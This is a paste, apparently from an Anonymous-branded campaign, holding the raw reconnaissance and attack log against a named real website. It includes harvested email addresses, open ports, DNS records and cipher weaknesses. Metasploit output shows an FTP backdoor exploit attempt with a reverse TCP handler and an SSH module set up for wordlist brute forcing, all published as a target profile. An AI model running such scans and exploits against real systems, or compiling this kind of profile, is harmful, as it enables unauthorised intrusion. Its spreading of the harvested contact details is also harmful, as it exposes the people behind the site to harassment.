Anonymous JTSEC #OpDomesticTerrorism Full Recon #10

a guest
Aug 17th, 2018
  1. ######################################################################################################################################
  2. Hostname mississippiwhiteknights.com ISP Affinity Internet, Inc
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region Unknown Local time 16 Aug 2018 22:08 CDT
  7. City Unknown Postal Code Unknown
  8. IP Address 207.150.212.85 Latitude 37.751
  9. Longitude -97.822
  10. #######################################################################################################################################
  11. HostIP:207.150.212.85
  12. HostName:mississippiwhiteknights.com
  13.  
  14. Gathered Inet-whois information for 207.150.212.85
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum: 207.89.128.0 - 207.174.215.255
  19. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  20. descr: IPv4 address block not managed by the RIPE NCC
  21. remarks: ------------------------------------------------------
  22. remarks:
  23. remarks: You can find the whois server to query, or the
  24. remarks: IANA registry to query on this web page:
  25. remarks: http://www.iana.org/assignments/ipv4-address-space
  26. remarks:
  27. remarks: You can access databases of other RIRs at:
  28. remarks:
  29. remarks: AFRINIC (Africa)
  30. remarks: http://www.afrinic.net/ whois.afrinic.net
  31. remarks:
  32. remarks: APNIC (Asia Pacific)
  33. remarks: http://www.apnic.net/ whois.apnic.net
  34. remarks:
  35. remarks: ARIN (Northern America)
  36. remarks: http://www.arin.net/ whois.arin.net
  37. remarks:
  38. remarks: LACNIC (Latin America and the Carribean)
  39. remarks: http://www.lacnic.net/ whois.lacnic.net
  40. remarks:
  41. remarks: IANA IPV4 Recovered Address Space
  42. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  43. remarks:
  44. remarks: ------------------------------------------------------
  45. country: EU # Country is really world wide
  46. admin-c: IANA1-RIPE
  47. tech-c: IANA1-RIPE
  48. status: ALLOCATED UNSPECIFIED
  49. mnt-by: RIPE-NCC-HM-MNT
  50. mnt-lower: RIPE-NCC-HM-MNT
  51. mnt-routes: RIPE-NCC-RPSL-MNT
  52. created: 2018-07-09T15:19:08Z
  53. last-modified: 2018-07-09T15:19:08Z
  54. source: RIPE
  55.  
  56. role: Internet Assigned Numbers Authority
  57. address: see http://www.iana.org.
  58. admin-c: IANA1-RIPE
  59. tech-c: IANA1-RIPE
  60. nic-hdl: IANA1-RIPE
  61. remarks: For more information on IANA services
  62. remarks: go to IANA web site at http://www.iana.org.
  63. mnt-by: RIPE-NCC-MNT
  64. created: 1970-01-01T00:00:00Z
  65. last-modified: 2001-09-22T09:31:27Z
  66. source: RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.91.2 (ANGUS)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for mississippiwhiteknights.com
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74. Domain Name: MISSISSIPPIWHITEKNIGHTS.COM
  75. Registry Domain ID: 192099484_DOMAIN_COM-VRSN
  76. Registrar WHOIS Server: whois.domainpeople.com
  77. Registrar URL: http://www.domainpeople.com
  78. Updated Date: 2016-08-12T20:53:12Z
  79. Creation Date: 2005-08-02T00:16:09Z
  80. Registry Expiry Date: 2021-08-02T00:16:09Z
  81. Registrar: DomainPeople, Inc.
  82. Registrar IANA ID: 65
  83. Registrar Abuse Contact Email:
  84. Registrar Abuse Contact Phone:
  85. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  86. Name Server: ADNS.CS.SITEPROTECT.COM
  87. Name Server: BDNS.CS.SITEPROTECT.COM
  88. DNSSEC: unsigned
  89. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  90. >>> Last update of whois database: 2018-08-17T03:12:18Z <<<
  91.  
  92. For more information on Whois status codes, please visit https://icann.org/epp
  93.  
  94. NOTICE: The expiration date displayed in this record is the date the
  95. registrar's sponsorship of the domain name registration in the registry is
  96. currently set to expire. This date does not necessarily reflect the expiration
  97. date of the domain name registrant's agreement with the sponsoring
  98. registrar. Users may consult the sponsoring registrar's Whois database to
  99. view the registrar's reported date of expiration for this registration.
  100.  
  101. TERMS OF USE: You are not authorized to access or query our Whois
  102. database through the use of electronic processes that are high-volume and
  103. automated except as reasonably necessary to register domain names or
  104. modify existing registrations; the Data in VeriSign Global Registry
  105. Services' ("VeriSign") Whois database is provided by VeriSign for
  106. information purposes only, and to assist persons in obtaining information
  107. about or related to a domain name registration record. VeriSign does not
  108. guarantee its accuracy. By submitting a Whois query, you agree to abide
  109. by the following terms of use: You agree that you may use this Data only
  110. for lawful purposes and that under no circumstances will you use this Data
  111. to: (1) allow, enable, or otherwise support the transmission of mass
  112. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  113. or facsimile; or (2) enable high volume, automated, electronic processes
  114. that apply to VeriSign (or its computer systems). The compilation,
  115. repackaging, dissemination or other use of this Data is expressly
  116. prohibited without the prior written consent of VeriSign. You agree not to
  117. use electronic processes that are automated and high-volume to access or
  118. query the Whois database except as reasonably necessary to register
  119. domain names or modify existing registrations. VeriSign reserves the right
  120. to restrict your access to the Whois database in its sole discretion to ensure
  121. operational stability. VeriSign may restrict or terminate your access to the
  122. Whois database for failure to abide by these terms of use. VeriSign
  123. reserves the right to modify these terms at any time.
  124.  
  125. The Registry database contains ONLY .COM, .NET, .EDU domains and
  126. Registrars.
  127.  
  128. Gathered Netcraft information for mississippiwhiteknights.com
  129. ---------------------------------------------------------------------------------------------------------------------------------------
  130.  
  131. Retrieving Netcraft.com information for mississippiwhiteknights.com
  132. Netcraft.com Information gathered
  133.  
  134. Gathered Subdomain information for mississippiwhiteknights.com
  135. ---------------------------------------------------------------------------------------------------------------------------------------
  136. Searching Google.com:80...
  137. Searching Altavista.com:80...
  138. Found 0 possible subdomain(s) for host mississippiwhiteknights.com, Searched 0 pages containing 0 results
  139.  
  140. Gathered E-Mail information for mississippiwhiteknights.com
  141. ---------------------------------------------------------------------------------------------------------------------------------------
  142. Searching Google.com:80...
  143. Searching Altavista.com:80...
  144. Found 0 E-Mail(s) for host mississippiwhiteknights.com, Searched 0 pages containing 0 results
  145.  
  146. Gathered TCP Port information for 207.150.212.85
  147. ---------------------------------------------------------------------------------------------------------------------------------------
  148.  
  149. Port State
  150.  
  151. 21/tcp open
  152. 22/tcp open
  153. 80/tcp open
  154.  
  155. Portscan Finished: Scanned 150 ports, 140 ports were in state closed
  156.  
  157. #######################################################################################################################################
  158. [i] Scanning Site: http://mississippiwhiteknights.com
  159.  
  160.  
  161.  
  162. B A S I C I N F O
  163. =======================================================================================================================================
  164.  
  165.  
  166. [+] Site Title:
  167. [+] IP address: 207.150.212.85
  168. [+] Web Server: Apache
  169. [+] CMS: Could Not Detect
  170. [+] Cloudflare: Not Detected
  171. [+] Robots File: Found
  172.  
  173. -------------[ contents ]----------------
  174. User-agent: *
  175. Allow: *
  176.  
  177.  
  178. H T T P H E A D E R S
  179. =======================================================================================================================================
  180.  
  181.  
  182. [i] HTTP/1.1 200 OK
  183. [i] Date: Fri, 17 Aug 2018 03:24:20 GMT
  184. [i] Server: Apache
  185. [i] Last-Modified: Thu, 06 Dec 2007 23:55:57 GMT
  186. [i] ETag: "40c-440a6df015d40"
  187. [i] Accept-Ranges: bytes
  188. [i] Content-Length: 1036
  189. [i] Connection: close
  190. [i] Content-Type: text/html
  191.  
  192.  
  193. #######################################################################################################################################
  194.  
  195. [?] Enter the target: http://mississippiwhiteknights.com/firstpage.htm
  196. [!] IP Address : 207.150.212.85
  197. [!] Server: Apache
  198. [+] Clickjacking protection is not in place.
  199. [+] Operating System : Debian
  200. [!] mississippiwhiteknights.com doesn't seem to use a CMS
  201. [+] Honeypot Probabilty: 0%
  202. ---------------------------------------------------------------------------------------------------------------------------------------
  203. [~] Trying to gather whois information for mississippiwhiteknights.com
  204. [+] Whois information found
  205. [-] Unable to build response, visit https://who.is/whois/mississippiwhiteknights.com
  206. ---------------------------------------------------------------------------------------------------------------------------------------
  207. API count exceeded - Increased quota available with membership
  208. ---------------------------------------------------------------------------------------------------------------------------------------
  209.  
  210. [+] DNS Records
  211. bdns.cs.siteprotect.com. (64.41.114.12) AS7215 Affinity Internet, Inc United States
  212. adns.cs.siteprotect.com. (64.41.112.12) AS7215 Affinity Internet, Inc United States
  213.  
  214. [+] MX Records
  215. 10 (64.26.60.153) AS20401 Hostway Corporation United States
  216.  
  217. [+] Host Records (A)
  218. mississippiwhiteknights.comHTTP: (207.150.212.85) AS20401 Hostway Corporation United States
  219. mail.mississippiwhiteknights.com (mx0.mfg.onr.siteprotect.com) (64.26.60.153) AS20401 Hostway Corporation United States
  220.  
  221. [+] TXT Records
  222.  
  223. [+] DNS Map: https://dnsdumpster.com/static/map/mississippiwhiteknights.com.png
  224.  
  225. [>] Initiating 3 intel modules
  226. [>] Loading Alpha module (1/3)
  227. [>] Beta module deployed (2/3)
  228. [>] Gamma module initiated (3/3)
  229.  
  230.  
  231. [+] Emails found:
  232. ---------------------------------------------------------------------------------------------------------------------------------------
  233. emperor@mississippiwhiteknights.com
  234. ewk@mississippiwhiteknights.com
  235. imperialkludd@mississippiwhiteknights.com
  236. iw@mississippiwhiteknights.com
  237. pixel-1534475583153454-web-@mississippiwhiteknights.com
  238.  
  239. [+] Hosts found in search engines:
  240. ---------------------------------------------------------------------------------------------------------------------------------------
  241. [-] Resolving hostnames IPs...
  242. 207.150.212.85:Www.mississippiwhiteknights.com
  243. 64.26.60.153:mail.mississippiwhiteknights.com
  244. 207.150.212.85:www.mississippiwhiteknights.com
  245. [+] Virtual hosts:
  246. ---------------------------------------------------------------------------------------------------------------------------------------
  247. 207.150.212.85 www.chicagoland
  248. 207.150.212.85 www.gilpinezo.com
  249. 207.150.212.85 tarponshores
  250. 207.150.212.85 rafs.net
  251. 207.150.212.85 www.cthomasgroup
  252. 207.150.212.85 shypula
  253. 207.150.212.85 www.impulsopedagogico.com
  254. 207.150.212.85 sensiblepsychiatry
  255. [~] Crawling the target for fuzzable URLs
  256. [-] No fuzzable URLs found
  257. #######################################################################################################################################
  258. [*] Processing domain mississippiwhiteknights.com
  259. [+] Getting nameservers
  260. 64.41.114.12 - bdns.cs.siteprotect.com
  261. 64.41.112.12 - adns.cs.siteprotect.com
  262. [-] Zone transfer failed
  263.  
  264. [+] MX records found, added to target list
  265. 10 mail.mississippiwhiteknights.com.
  266.  
  267. [*] Scanning mississippiwhiteknights.com for A records
  268. 207.150.212.85 - mississippiwhiteknights.com
  269. 207.150.212.85 - ftp.mississippiwhiteknights.com
  270. 64.26.60.153 - mail.mississippiwhiteknights.com
  271. 64.26.60.229 - pop.mississippiwhiteknights.com
  272. 64.26.60.229 - smtp.mississippiwhiteknights.com
  273. 207.150.212.85 - www.mississippiwhiteknights.com
  274.  
  275. #######################################################################################################################################
  276. dnsenum VERSION:1.2.4
  277.  
  278. ----- mississippiwhiteknights.com -----
  279.  
  280.  
  281. Host's addresses:
  282. __________________
  283.  
  284. mississippiwhiteknights.com. 3443 IN A 207.150.212.85
  285.  
  286.  
  287. Name Servers:
  288. ______________
  289.  
  290. bdns.cs.siteprotect.com. 1002 IN A 64.41.114.12
  291. adns.cs.siteprotect.com. 1002 IN A 64.41.112.12
  292.  
  293.  
  294. Mail (MX) Servers:
  295. ___________________
  296.  
  297. mail.mississippiwhiteknights.com. 3600 IN A 64.26.60.153
  298.  
  299.  
  300. Trying Zone Transfers and getting Bind Versions:
  301. _________________________________________________
  302.  
  303.  
  304. Trying Zone Transfer for mississippiwhiteknights.com on bdns.cs.siteprotect.com ...
  305.  
  306. Trying Zone Transfer for mississippiwhiteknights.com on adns.cs.siteprotect.com ...
  307.  
  308. brute force file not specified, bay.
  309. #######################################################################################################################################
  310. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
  311. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  312. Host is up (0.54s latency).
  313. Not shown: 466 closed ports, 6 filtered ports
  314. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  315. PORT STATE SERVICE
  316. 21/tcp open ftp
  317. 22/tcp open ssh
  318. 80/tcp open http
  319. 443/tcp open https
  320.  
  321. Nmap done: 1 IP address (1 host up) scanned in 8.29 seconds
  322. #######################################################################################################################################
  323. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
  324. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  325. Host is up (0.76s latency).
  326.  
  327. PORT STATE SERVICE
  328. 53/udp open|filtered domain
  329. 67/udp open|filtered dhcps
  330. 68/udp open|filtered dhcpc
  331. 69/udp open|filtered tftp
  332. 88/udp open|filtered kerberos-sec
  333. 123/udp open|filtered ntp
  334. 137/udp open|filtered netbios-ns
  335. 138/udp open|filtered netbios-dgm
  336. 139/udp open|filtered netbios-ssn
  337. 161/udp open snmp
  338. 162/udp open|filtered snmptrap
  339. 389/udp open|filtered ldap
  340. 520/udp open|filtered route
  341. 2049/udp open|filtered nfs
  342.  
  343. Nmap done: 1 IP address (1 host up) scanned in 4.48 seconds
  344. #######################################################################################################################################
  345. + -- --=[Port 21 opened... running tests...
  346. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
  347. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  348. Host is up (0.11s latency).
  349.  
  350. PORT STATE SERVICE VERSION
  351. 21/tcp filtered ftp
  352. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  353. Device type: firewall|general purpose
  354. Running: Linux 2.4.X|2.6.X, ISS embedded
  355. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  356. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  357.  
  358. TRACEROUTE (using proto 1/icmp)
  359. HOP RTT ADDRESS
  360. 1 ... 30
  361.  
  362. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  363. Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
  364.  
  365.  
  381.  
  382.  
  383. =[ metasploit v4.17.3-dev ]
  384. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  385. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  386. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  387.  
  388. RHOST => mississippiwhiteknights.com
  389. RHOSTS => mississippiwhiteknights.com
  390. [+] 207.150.212.85:21 - FTP Banner: '220 Welcome.\x0d\x0a'
  391. [*] mississippiwhiteknights.com:21 - Scanned 1 of 1 hosts (100% complete)
  392. [*] Auxiliary module execution completed
  393. [*] mississippiwhiteknights.com:21 - Scanned 1 of 1 hosts (100% complete)
  394. [*] Auxiliary module execution completed
  395. [*] mississippiwhiteknights.com:21 - Banner: 220 Welcome.
  396. [*] mississippiwhiteknights.com:21 - USER: 331 Please specify the password.
  397. [*] Exploit completed, but no session was created.
  398. [*] Started reverse TCP double handler on 10.211.1.5:4444
  399. [*] mississippiwhiteknights.com:21 - Sending Backdoor Command
  400. [*] Exploit completed, but no session was created.
  401. + -- --=[Port 22 opened... running tests...
  402. # general
  403. (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7
  404. (gen) software: OpenSSH 6.0p1
  405. (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
  406. (gen) compression: enabled (zlib@openssh.com)
  407.  
  408. # key exchange algorithms
  409. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
  410. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  411. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
  412. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  413. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
  414. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  415. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  416. `- [info] available since OpenSSH 4.4
  417. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  418. `- [warn] using weak hashing algorithm
  419. `- [info] available since OpenSSH 2.3.0
  420. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  421. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  422. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  423. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  424. `- [warn] using small 1024-bit modulus
  425. `- [warn] using weak hashing algorithm
  426. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  427.  
  428. # host-key algorithms
  429. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  430. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  431. `- [warn] using small 1024-bit modulus
  432. `- [warn] using weak random number generator could reveal the key
  433. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  434. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
  435. `- [warn] using weak random number generator could reveal the key
  436. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  437.  
  438. # encryption algorithms (ciphers)
  439. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  440. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  441. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  442. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  443. `- [warn] using weak cipher mode
  444. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  445. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  446. `- [warn] using weak cipher
  447. `- [warn] using weak cipher mode
  448. `- [warn] using small 64-bit block size
  449. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  450. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  451. `- [fail] disabled since Dropbear SSH 0.53
  452. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  453. `- [warn] using weak cipher mode
  454. `- [warn] using small 64-bit block size
  455. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  456. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  457. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  458. `- [warn] using weak cipher mode
  459. `- [warn] using small 64-bit block size
  460. `- [info] available since OpenSSH 2.1.0
  461. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  462. `- [warn] using weak cipher mode
  463. `- [info] available since OpenSSH 2.3.0
  464. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  465. `- [warn] using weak cipher mode
  466. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  467.  
  468. # message authentication code algorithms
  469. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  470. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  471. `- [warn] using encrypt-and-MAC mode
  472. `- [warn] using weak hashing algorithm
  473. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  474. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  475. `- [warn] using weak hashing algorithm
  476. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  477. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  478. `- [warn] using small 64-bit tag size
  479. `- [info] available since OpenSSH 4.7
  480. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  481. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  482. (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  483. `- [warn] using encrypt-and-MAC mode
  484. `- [info] available since OpenSSH 5.9
  485. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  486. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  487. (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  488. `- [warn] using encrypt-and-MAC mode
  489. `- [info] available since OpenSSH 5.9
  490. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  491. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  492. `- [warn] using encrypt-and-MAC mode
  493. `- [info] available since OpenSSH 2.5.0
  494. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  495. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  496. `- [warn] using encrypt-and-MAC mode
  497. `- [info] available since OpenSSH 2.1.0
  498. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  499. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  500. `- [warn] using encrypt-and-MAC mode
  501. `- [warn] using weak hashing algorithm
  502. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  503. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  504. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  505. `- [warn] using encrypt-and-MAC mode
  506. `- [warn] using weak hashing algorithm
  507. `- [info] available since OpenSSH 2.5.0
  508.  
  509. # algorithm recommendations (for OpenSSH 6.0)
  510. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  511. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  512. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  513. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
  514. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
  515. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
  516. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
  517. (rec) -ssh-dss -- key algorithm to remove
  518. (rec) -blowfish-cbc -- enc algorithm to remove
  519. (rec) -3des-cbc -- enc algorithm to remove
  520. (rec) -aes256-cbc -- enc algorithm to remove
  521. (rec) -cast128-cbc -- enc algorithm to remove
  522. (rec) -aes192-cbc -- enc algorithm to remove
  523. (rec) -aes128-cbc -- enc algorithm to remove
  524. (rec) -hmac-md5-96 -- mac algorithm to remove
  525. (rec) -hmac-sha2-256-96 -- mac algorithm to remove
  526. (rec) -hmac-ripemd160 -- mac algorithm to remove
  527. (rec) -hmac-sha1-96 -- mac algorithm to remove
  528. (rec) -umac-64@openssh.com -- mac algorithm to remove
  529. (rec) -hmac-md5 -- mac algorithm to remove
  530. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  531. (rec) -hmac-sha1 -- mac algorithm to remove
  532. (rec) -hmac-sha2-512-96 -- mac algorithm to remove
  533.  
  534. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:28 EDT
  535. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  536. Host is up (0.013s latency).
  537.  
  538. PORT STATE SERVICE VERSION
  539. 22/tcp filtered ssh
  540. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  541. Device type: firewall|general purpose
  542. Running: Linux 2.4.X|2.6.X, ISS embedded
  543. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  544. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  545.  
  546. TRACEROUTE (using proto 1/icmp)
  547. HOP RTT ADDRESS
  548. 1 ... 30
  549.  
  550. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  551. Nmap done: 1 IP address (1 host up) scanned in 11.59 seconds
  552.  
  569.  
  570.  
  571. =[ metasploit v4.17.3-dev ]
  572. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  573. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  574. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  575.  
  576. USER_FILE => /brutex/wordlists/simple-users.txt
  577. RHOSTS => mississippiwhiteknights.com
  578. RHOST => mississippiwhiteknights.com
  579. [+] 207.150.212.85:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
  580. [*] mississippiwhiteknights.com:22 - Scanned 1 of 1 hosts (100% complete)
  581. [*] Auxiliary module execution completed
  582. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  583. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  584. [+] 207.150.212.85:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
  585. [*] mississippiwhiteknights.com:22 - Scanned 1 of 1 hosts (100% complete)
  586. [*] Auxiliary module execution completed
  587. #######################################################################################################################################
  588.  
  596.  
  597. WAFW00F - Web Application Firewall Detection Tool
  598.  
  599. By Sandro Gauci && Wendel G. Henrique
  600.  
  601. Checking http://mississippiwhiteknights.com
  602. Generic Detection results:
  603. No WAF detected by the generic detection
  604. Number of requests: 14
  605. #######################################################################################################################################
  606.  
  607. wig - WebApp Information Gatherer
  608.  
  609.  
  610. Scanning http://mississippiwhiteknights.com...
  611. __________________ SITE INFO __________________
  612. IP Title
  613. 207.150.212.85
  614.  
  615. ___________________ VERSION ___________________
  616. Name Versions Type
  617. Apache Platform
  618.  
  619. _________________ INTERESTING _________________
  620. URL Note Type
  621. /test.htm Test file Interesting
  622. /test.html Test file Interesting
  623.  
  624. _______________________________________________
  625. Time: 112.2 sec Urls: 599 Fingerprints: 40401
  626. #######################################################################################################################################
  627. HTTP/1.1 200 OK
  628. Date: Fri, 17 Aug 2018 03:30:59 GMT
  629. Server: Apache
  630. Last-Modified: Thu, 06 Dec 2007 23:55:57 GMT
  631. ETag: "40c-440a6df015d40"
  632. Accept-Ranges: bytes
  633. Content-Length: 1036
  634. Content-Type: text/html
  635. #######################################################################################################################################
  636. ^ ^
  637. _ __ _ ____ _ __ _ _ ____
  638. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  639. | V V // o // _/ | V V // 0 // 0 // _/
  640. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  641. <
  642. ...'
  643.  
  644. WAFW00F - Web Application Firewall Detection Tool
  645.  
  646. By Sandro Gauci && Wendel G. Henrique
  647.  
  648. Checking https://mississippiwhiteknights.com
  649. Generic Detection results:
  650. No WAF detected by the generic detection
  651. Number of requests: 14
  652. #######################################################################################################################################
  653.  
  654.  
  655. AVAILABLE PLUGINS
  656. -----------------
  657.  
  658. PluginSessionResumption
  659. PluginCertInfo
  660. PluginHeartbleed
  661. PluginCompression
  662. PluginChromeSha1Deprecation
  663. PluginOpenSSLCipherSuites
  664. PluginHSTS
  665. PluginSessionRenegotiation
  666.  
  667.  
  668.  
  669. CHECKING HOST(S) AVAILABILITY
  670. -----------------------------
  671.  
  672. mississippiwhiteknights.com:443 => 207.150.212.85:443
  673.  
  674.  
  675.  
  676. SCAN RESULTS FOR MISSISSIPPIWHITEKNIGHTS.COM:443 - 207.150.212.85:443
  677. ---------------------------------------------------------------------
  678.  
  679. * Deflate Compression:
  680. OK - Compression disabled
  681.  
  682. * Session Renegotiation:
  683. Client-initiated Renegotiations: VULNERABLE - Server honors client-initiated renegotiations
  684. Secure Renegotiation: OK - Supported
  685.  
  686. * Certificate - Content:
  687. SHA1 Fingerprint: 19748f82cd2e883d65570e2fb4ee056c508ca2e7
  688. Common Name: *.securedata.net
  689. Issuer: RapidSSL RSA CA 2018
  690. Serial Number: 04D8CEFFF3C04787DCFA82FDAF7C35CC
  691. Not Before: Jul 24 00:00:00 2018 GMT
  692. Not After: Jul 24 12:00:00 2019 GMT
  693. Signature Algorithm: sha256WithRSAEncryption
  694. Public Key Algorithm: rsaEncryption
  695. Key Size: 2048 bit
  696. Exponent: 65537 (0x10001)
  697. X509v3 Subject Alternative Name: {'DNS': ['*.securedata.net', 'securedata.net']}
  698.  
  699. * Certificate - Trust:
  700. Hostname Validation: FAILED - Certificate does NOT match mississippiwhiteknights.com
  701. Google CA Store (09/2015): OK - Certificate is trusted
  702. Java 6 CA Store (Update 65): OK - Certificate is trusted
  703. Microsoft CA Store (09/2015): OK - Certificate is trusted
  704. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  705. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  706. Certificate Chain Received: ['*.securedata.net', 'RapidSSL RSA CA 2018']
  707.  
  708. * Certificate - OCSP Stapling:
  709. NOT SUPPORTED - Server did not send back an OCSP response.
  710.  
  711. * SSLV2 Cipher Suites:
  712. Server rejected all cipher suites.
  713.  
  714. * Session Resumption:
  715. With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
  716. With TLS Session Tickets: OK - Supported
  717.  
  718. * SSLV3 Cipher Suites:
  719. Server rejected all cipher suites.
  720.  
  721.  
  722.  
  723. SCAN COMPLETED IN 11.40 S
  724. -------------------------
